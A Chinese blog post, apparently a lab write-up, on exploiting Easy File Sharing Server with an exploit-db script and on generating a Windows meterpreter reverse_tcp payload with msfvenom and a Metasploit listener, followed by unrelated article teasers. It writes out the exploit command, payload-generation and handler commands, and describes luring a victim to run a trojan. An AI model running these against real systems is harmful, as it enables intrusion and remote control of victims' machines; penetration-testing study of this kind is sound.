news 2026/6/9 9:17:25

easy file sharing server漏洞渗透测试和kali中生成被控端

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
easy file sharing server漏洞渗透测试和kali中生成被控端

一.远程控制-正向连接方式-黑客(客户端)先主动连接木马(服务端)

二.远程控制-反向连接-主动连接黑客(客户端)

诱使Rebecca

下载server.EXE并运行

server.EXE已配置

Yuri的IP地址和端口

三.easy file sharing server漏洞渗透测试

在windows上安装easy file sharing server

然后查询靶机(windows)的IP地址

在靶机上打开easy file sharing server,然后再打开kali的终端用nmap 扫描目标主机开放的端口,输入命令【nmap -sV [IP]】

发现80端口上运行了easy file sharing server

然后searchsploit查EasyFileSharing存在的漏洞,输入【searchsploit easy file sharing server】

以该漏洞为例,利用该漏洞使得靶机运行计算器

现在执行这个python脚本,执行时需要提供两个参数(靶机IP和目标端口),输入【python2 /usr/share/exploitdb/exploits/windows/remote/39009.py [靶机IP] 80】,执行该命令后渗透模块会连接到【目标IP】的80端口,将指定代码送过去

可以看到我们已经启动了计算器。

四.kali中生成被控端

Msfvenom 用到参数-p、-f 、-o

-p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe –o /root/payload.exe

-p, –payload Payload to use;指定哪些有效载荷生成

本例中 windows/meterpreter/reverse_tcp :用于Windows平台的反向远程控制程序

-f, –format Output format;指定有效载荷的格式

本例中 exe 生成Windows系统的可执行文件

-o, –out Save the payload;指定保存位置

本例中 /root/payload.exe

1.首先ifconfig查看kali的IP地址

2.输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=【IP地址】lport=5000 -f exe -o /var/payload.exe,可以看到生成的被控端程序文件在var目录下

3.直接输入msfconsole命令启动Metasploit

4.依次输入use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 【IP地址】

set lport 5000

exploit

主控端启动完成

5.将生成的被控端提交到www.virustotal.com检测

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/4 13:20:29

Git Merge解决多人协作开发PyTorch项目的冲突

Git Merge 解决多人协作开发 PyTorch 项目的冲突 在现代深度学习项目中,一个常见的场景是:两位开发者同时优化同一个 ResNet 模块——一人想加入 Dropout 提升泛化能力,另一人则希望启用 inplaceTrue 节省内存。当他们各自提交代码后尝试合并…

作者头像 李华
网站建设 2026/6/4 4:35:37

高频电源设计中电感的作用与优化

高频电源设计中电感的作用与优化:从材料到布局的全链路实战指南 你有没有遇到过这样的情况? 一个Buck电路明明参数算得清清楚楚,仿真波形也漂亮,可一上板子就出问题:输出纹波大得离谱、电感发热烫手、EMI测试直接挂掉…

作者头像 李华
网站建设 2026/6/5 4:34:28

NCM音频解密终极指南:一键解锁加密音乐文件

NCM音频解密终极指南:一键解锁加密音乐文件 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 现状分析:数字音乐版权保护的困境 在当今数字音乐时代,各大音乐平台为了保护版权利益,普遍…

作者头像 李华
网站建设 2026/6/4 12:00:27

PyTorch张量在CPU和GPU之间迁移的正确姿势

PyTorch张量在CPU和GPU之间迁移的正确姿势 在现代深度学习开发中,一个看似简单却极易出错的操作,往往决定了整个训练流程的稳定性和效率——那就是张量在 CPU 和 GPU 之间的迁移。尽管 PyTorch 提供了简洁的 .to() 方法,但许多开发者仍会在实…

作者头像 李华
网站建设 2026/6/1 4:17:55

5分钟掌握窗口置顶神器:AlwaysOnTop让你的工作效率翻倍

还在为频繁切换窗口而打断工作节奏吗?AlwaysOnTop是一款专为Windows用户设计的轻量级窗口管理工具,能够将任意应用窗口固定在屏幕最前端,彻底解决多任务处理中的窗口遮挡问题。这款仅几百KB的小工具,却能为你的工作流程带来革命性…

作者头像 李华
网站建设 2026/5/30 15:22:02

PotPlayer字幕翻译插件深度体验:3大核心功能解锁多语言观影自由

还在为看不懂的外语字幕而烦恼吗?作为资深影迷的我,今天要分享一款让观影体验彻底升级的神器——PotPlayer百度翻译字幕插件。这款插件能够实时翻译视频字幕,让你轻松跨越语言障碍,享受全球影视内容的乐趣。 【免费下载链接】PotP…

作者头像 李华